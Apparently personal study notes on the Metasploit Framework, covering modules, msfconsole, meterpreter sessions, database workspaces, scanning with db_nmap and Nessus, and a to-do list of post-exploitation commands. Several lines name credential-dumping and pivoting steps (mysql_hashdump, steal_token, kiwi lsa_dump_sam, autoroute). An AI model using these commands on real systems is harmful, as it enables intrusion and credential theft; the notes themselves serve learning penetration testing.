Metasploit framework

metasploitframework metasploitintro rpmetasploit rpmetasploit metasploitexploitation meterpreter adventofcyber4

The Metasploit Framework is a penetration testing framework that you can use to test a system.

Scripts to exploit vulnerabilities are written in Ruby πŸ’Ž. There are many scripts already available.

Learn πŸŽ“

Scripts are divided into modules πŸ“Œ

  • Auxiliary: test the availability of an exploit
  • Payloads: the data sent to perform the attack
    • Single/inline/stageless payloads (1 exchange)
    • Staged payloads (2 exchanges)
    • See msfvenom for details and payload creation.
  • Exploits: code exploiting a vulnerability
  • Encoders/Evasion/NOPs
  • Post: scripts that you can use once on the target



The msfconsole is a component of the metasploit framework used to search and configure modules to exploit a vulnerability, and eventually, spawn a remote shell, which may be a meterpreter shell.

$ msfconsole -q
msf6> help
msf6> help <command>
msf6> help help # example

You can see every command you used with history.

Each remote access is wrapped in a session.

You can also configure and execute an exploit in one go:

exploit> run opt=value opt2=value [...]
exploit> check opt=value opt2=value [...] 


The meterpreter is one of the components of the metasploit framework. It's a reverse shell with common scripts loaded to make Privilege escalation and Post-exploitation easier.

It's an in-memory reverse shell using encrypted communications. To upgrade a normal shell (note down the sid when using background), use:

# upgrade
msf6 exploit('module_used')> sessions -u -1
# kill the non-meterpreter session
msf6 exploit('module_used')> sessions -k old_session_id
# move to the meterpreter session
msf6 exploit('module_used')> sessions -i new_session_id
# done

Commands that you can use in the meterpreter are different based on the payload that you used.

Call help to see what you can use given the current payload.

meterpreter > help # list commands that you can use

Common commands πŸͺ΄

Uncommon usages

Metasploit database

$ sudo systemctl start postgresql
$ sudo msfdb init
$ msfconsole -q
msf6> db_status
[*] Connected to msf. Connection type: postgresql.

You can export results using: db_export -f xml db.xml.


To keep things clean and tidy, it's better to create a workspace, so that results from other scans don't get mixed up.

msf6> workspace # list workspaces
msf6> workspace -a xxx # create xxx
msf6> workspace xxx # move to xxx
msf6> workspace -d xxx # delete xxx

port scanner

The command db_nmap is the same as nmap. You will have to first set up metasploit database.

msf6> db_nmap -sV -p- -A IP
msf6> db_import nmap_result.xml # or, load scan result

banner grabbing

msf6> use auxiliary/scanner/http/http_version # HTTP

SQL utility

msf6> use auxiliary/scanner/mysql/mysql_schemadump # dump cols+tables
msf6> use auxiliary/scanner/mysql/mysql_hashdump # dump dump users+hash
msf6> use mysql_sql # send SQL queries
msf6> use auxiliary/scanner/postgres/postgres_schemadump # ...
msf6> use auxiliary/admin/postgres/postgres_sql # ...


The msfconsole can be used along Nessus. See this tutorial and these tips. Note that you need to start metasploit database first.

msf6> load nessus
msf6> nessus_help # list commands
msf6> # Connect
msf6> nessus_connect user:pass@localhost:8834
msf6> # List the scans that you did
msf6> nessus_scan_list
msf6> # Import the result of a scan
msf6> nessus_db_import id_you_found_in_the_list

Useful commands

Once you stored something in the database (nmap/nessus/...), you can use these commands to operate on the saved data.

msf6> help hosts
msf6> help services
msf6> help vulns
msf6> help creds
msf6> help loot

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • Commands:
    • Jobs are cancellable processes (kill): run -j, jobs, jobs -i 0
    • exploit -k -z
  • get xxx
  • spool
  • run autoroute -h (autoroute module)
    • socks
    • proxychains
    • set PROXIES HTTP:
  • show advanced options, advanced
  • search type:exploit platform:windows target:xp smb
  • exploit/windows/smb/ms08_067_netapi
  • multi/ssh/sshexec

You can prepend any command using grep to filter lines. You can chain them too. grep x grep y <command>.

  • Meterpreter: steal_token <pid>
  • Hashdump not working on some Windows: load kiwi then lsa_dump_sam do the job. See also: lsa_dump_secrets.
  • Plugins: /usr/share/metasploit-framework/plugins
  • use /path/to/xxx.rb (tested: relative to exploit)